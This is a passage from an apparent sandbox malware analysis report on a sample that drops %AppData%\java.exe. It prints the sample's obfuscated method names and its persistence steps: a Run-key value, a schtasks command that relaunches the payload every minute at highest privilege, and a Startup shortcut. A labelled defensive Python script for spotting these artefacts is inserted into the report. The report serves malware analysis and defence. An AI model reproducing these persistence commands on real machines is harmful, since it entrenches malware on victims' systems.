'uL1DwVlYMUkTdnhwnmAnaqk0tt6mayGu1ElOOdpSpuRwHa7BetGSQvHbsyH7BnrCgRzM8tAhbcAEMZzSZgbV', 'Fa7heNWSiOMFvASfglCx9UqGjkwzm7pMdqK9RS7xVOCZbiMmKjab3hMRz0tT792MRNSD7TJ5EiEAOwT3ZpIn'
                      Source: java.exe.0.dr, gGSik08LJTvBozHQW2rJNQsWdcNqnyZUe86p7yncuFlms6MojWQZlBOUXgyIdyiSbbkQtu.cs High entropy of concatenated method names: '_0sZQYedQljFSbXXuOyuPxQdGKQELj0m0REObc239KzIUZYGFf8ji5CEhsB9mIjAddO3ohy', 'BoHDOoCcD96rKe1oXlAqYjRFAk0e6ec6EPHPZRhV0073w7ZsAmJ344EEwcvWomFToSvgGQ', 'GpBfp25jiKTpysZ8XZxqlnl6JGyhJouJZxiVO27sSSfNWyWreFw1TGubxx0XPZiuVqxIVw', 'TStr6eh2tebBwJcgyoRwvx7j2JeAoS8V2KRIGrRtfb2mBuegLPYnVhtGR8aR7xSVZedbu3', 'H4XDsSzLbdVnNJNuAicSH4sSiDVURiJiznnTy4I7V6d2QlycoWNrnMXzFIqGohSlLouYBl', 'hVsQkBRc0RNdXppjpR6d5e7aV8pXHXKLMIhwTZN0nP6m9Kq4KEwRLaKrf7n4Vig6INZC3A', 'BXnUn5K2xegL2grzQdkWolfQgjEcKm5rIyJ1CTbA4INmuTpelc6uihWmvOSKEHg9V1emDt', 'hrQJ8hfahL8zJzaOiYNo1ikssYmRGBdaX2uXlntMxnrjvOME4uj4qAqywRiqcCT5LPdKmh', 'Id2EO9nStfroOxv9GFmQk4t4x3K2Na4glKwMgpE7ebwcj54DStsQRul4M5E6PdMMt5fXl8', 'BxXFvzqTQ3Pkl8o8oA2wA3Ullqj3oMLgFJwMj8qcOWXModCyuxpSas54zQhD8pX2nztdKw'
                      Source: java.exe.0.dr, Cqf5ySADqnBBZJSGBs6XL0JHhzclJSTcTFxQnT47pV9tLeSqr21xtsUx8EfmB3gZ47HrV3.cs High entropy of concatenated method names: 'RqwE2GFuZfPUcJIcLBq3XX4TWcKN4NeBcC3owGqrsHgnPg8fcDMT2FTM9u1BPz1gWVKCDD', 'LwgBdoAJo6UU7T6dX82c19OKryiQHMZMkjG5iR5wKHkDuWH9J63uF0VR8pTKfHq0oHreUv', 'aHot2acFS5B8E3y8257ImU23ft1YZ14AKlcRbyr34qG9pMqHRLBWFYRSnBU33sxUNVLh2m', 'EY3Vih6tyin3ziN3AUFlzEoGl6pVfBhktI7RZapZwNVHIzaooGjR4CQwfclTcgNLdIfTNB', 'wf4G9slVDSMC', 'd4xfPfAvuBgg', 'MkVl2W4HuHga', 'vZnHyxzgm4el', 'zBnj4uHa8HGC', 'qSZb8axXCDZm'
                      Source: java.exe.0.dr, 775VniLT7bBOBCrgmDFH7fyve0dFdV6L3kiBaHDulpBhielIdxD38ipbQTK42LW6agwC07.cs High entropy of concatenated method names: 'T6K5wpb8o6jbbx1kRkiuj8cGRFvn9UfmJ2j1BgmUx0J2PCOR4qkwF26LHswdenuZ22A2Ht', '_55GbWsfTknBQ', 'lACv4mMLFCLy', 'RJcVX7XqfS8N', 'zsv7fUUItM9C'
                      Source: java.exe.0.dr, l54gtFtLpKyOWZi2thKGa1BAbVNOqqAtAL11OEGAtZRsmPvwHpaf.cs High entropy of concatenated method names: 'ytTJeaHBMZWBiKLPVFx3poRI0l1uJwq0MUUgA8FLnqh9ETdaW7FY', 'Jx1mjn7Ud3qlURoYy7Sl2fJeczHcya1KYR2LGeW7CWXovlBOm4Rq', 'sHt8heCBFmzo5DkswFX462I6hvwWcUBpif9DL5l4kfjgbAUiV2RT', 'kBG0UhwPFOGO8FOQQ5cnkUwRUOpIylq2KodeXX1X1VG5SSnQzKhF', 'jlZa1r2qdPhVrr8uGw7G0ujhhNuI1BVuAtn25R3MKoupMxAMYEGP', 'Z1fBvyDWNF6wNdzBrOYiHjiStu6o0p6NHe7zx88ogEZrkG1Emunx', 'fINzRsqpdNko3zAGgDDZSjwe7f9smxUwQTeLosUKDlP6RlkjEy7u', 'QhsO9etZ7leq4WlTrjoU9HrouhZrSiUdFfehMlFa1nsAfjD72vWy', 'JvH9qnWkWtw7IA4fjdNRFNhtCcOyxZJE9qLaM3VnZaxk7BwUOvc6', 'uVyEk9STM7Rev1s2XkUokUU0nRPcC2LphqvF5v8wTU4wjcWcH5zy'
                      Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Roaming\java.exe

                      Boot Survival

                      Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run java C:\Users\user\AppData\Roaming\java.exe
                      Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "java" /tr "C:\Users\user\AppData\Roaming\java.exe"
                      Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.lnk
                      Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run java
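The three Boot Survival entries above register one payload (the dropped %AppData%\Roaming\java.exe) through three mechanisms: an HKCU Run value, a scheduled task that re-launches it every minute with the highest privileges the creating user holds, and a Startup-folder shortcut. The following is an added example, not code from the report or from the sample, of how a responder can score such a schtasks command line and correlate the three artefacts by launch target. The event records are constructed from the report lines; the shortcut's target is an assumption, because the report only records that java.lnk was created, and the list of user-writable directories and the "five minutes or less" cut-off are heuristics chosen here.

```python
"""Triage of the three autostart artefacts listed under Boot Survival: an HKCU
Run value, a schtasks.exe job and a Startup-folder .lnk, all launching the
dropped %AppData%\\Roaming\\java.exe.

Added example, not code from the Joe Sandbox report or from the sample. The
SAMPLE_EVENTS below are constructed from the report lines; the shortcut target
is an assumption, because the report only records that java.lnk was created.
"""
import shlex
from collections import defaultdict

# Directory fragments a standard user can write to (assumed list). Legitimate
# autostarts rarely point here; droppers routinely do.
USER_WRITABLE = (
    "\\appdata\\roaming\\", "\\appdata\\local\\", "\\users\\public\\",
    "\\programdata\\", "\\temp\\", "\\downloads\\",
)


def normalize_path(path: str) -> str:
    """Strip quotes and lower-case, so one payload compares equal whether it
    appears as Run data, a task action or a shortcut target."""
    return path.strip().strip('"').lower()


def is_user_writable(path: str) -> bool:
    return any(marker in normalize_path(path) for marker in USER_WRITABLE)


def parse_schtasks(cmdline: str) -> dict:
    """Tokenize a schtasks.exe command line into {switch: value}.

    posix=False keeps backslashes literal and quoted arguments whole; switch
    names are lower-cased and value-less switches (/create, /f) map to True.
    """
    tokens = shlex.split(cmdline, posix=False)
    switches = {}
    i = 1  # tokens[0] is the schtasks.exe image path
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("/"):
            name = tok[1:].lower()
            if i + 1 < len(tokens) and not tokens[i + 1].startswith("/"):
                switches[name] = tokens[i + 1].strip('"')
                i += 2
                continue
            switches[name] = True
        i += 1
    return switches


def assess_schtasks(cmdline: str) -> list:
    """Reasons a schtasks command line looks like malware persistence; empty for
    /query, /delete and an ordinary daily job under Program Files."""
    sw = parse_schtasks(cmdline)
    reasons = []
    if "create" not in sw:
        return reasons
    if str(sw.get("sc", "")).lower() == "minute":
        try:
            every = int(str(sw.get("mo", "1")))  # schtasks defaults /MO to 1
        except ValueError:
            every = 1
        if every <= 5:
            reasons.append(f"high-frequency trigger: every {every} minute(s)")
    if str(sw.get("rl", "")).upper() == "HIGHEST":
        reasons.append("/RL HIGHEST: runs with the highest privileges the creator holds")
    action = sw.get("tr")
    if isinstance(action, str) and is_user_writable(action):
        reasons.append(f"action in user-writable path: {action}")
    if sw.get("f") is True:
        reasons.append("/f: overwrites an existing task of the same name without warning")
    return reasons


def correlate_persistence(events: list) -> dict:
    """Group artefacts by launch target: {target: sorted mechanism names}. One
    payload registered through several mechanisms, as in this report, is a far
    stronger signal than any single Run value."""
    by_target = defaultdict(set)
    for ev in events:
        if ev["type"] == "schtasks":
            sw = parse_schtasks(ev["cmdline"])
            if "create" in sw and isinstance(sw.get("tr"), str):
                by_target[normalize_path(sw["tr"])].add("scheduled task")
        elif ev["type"] == "run_key":
            by_target[normalize_path(ev["data"])].add("HKCU Run value")
        elif ev["type"] == "startup_lnk":
            by_target[normalize_path(ev["target"])].add("Startup folder shortcut")
    return {target: sorted(mechs) for target, mechs in by_target.items()}


# Constructed from the Boot Survival lines; the .lnk "target" is assumed.
SAMPLE_EVENTS = [
    {"type": "run_key", "key": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "name": "java", "data": r"C:\Users\user\AppData\Roaming\java.exe"},
    {"type": "schtasks", "cmdline": r'"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST '
                                    r'/sc minute /mo 1 /tn "java" /tr "C:\Users\user\AppData\Roaming\java.exe"'},
    {"type": "startup_lnk",
     "path": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.lnk",
     "target": r"C:\Users\user\AppData\Roaming\java.exe"},
]

if __name__ == "__main__":
    for reason in assess_schtasks(SAMPLE_EVENTS[1]["cmdline"]):
        print("schtasks:", reason)
    for target, mechanisms in correlate_persistence(SAMPLE_EVENTS).items():
        print(f"{target}: {len(mechanisms)} mechanisms -> {', '.join(mechanisms)}")
```

On a live host the same three inputs come from `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run`, `schtasks /query /v /fo csv` and a listing of the user's Startup folder; the shortcut's target has to be resolved from the .lnk itself, since a dropper can name the file anything. Note that a task with the same name as a legitimate product ("java") is not by itself evidence; the combination of a one-minute trigger, /RL HIGHEST and an action under %AppData% is.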

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (16 occurrences)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (12 occurrences)
                      Source: C:\Users\user\Desktop\file.exe Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\F6B74C14BDC1CCC7FF6E 88D9A666AFE4B49FD15B45F1DC568347855CF049E54918D00BAF1610AE750872
                      Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX (62 occurrences)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (134 occurrences)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
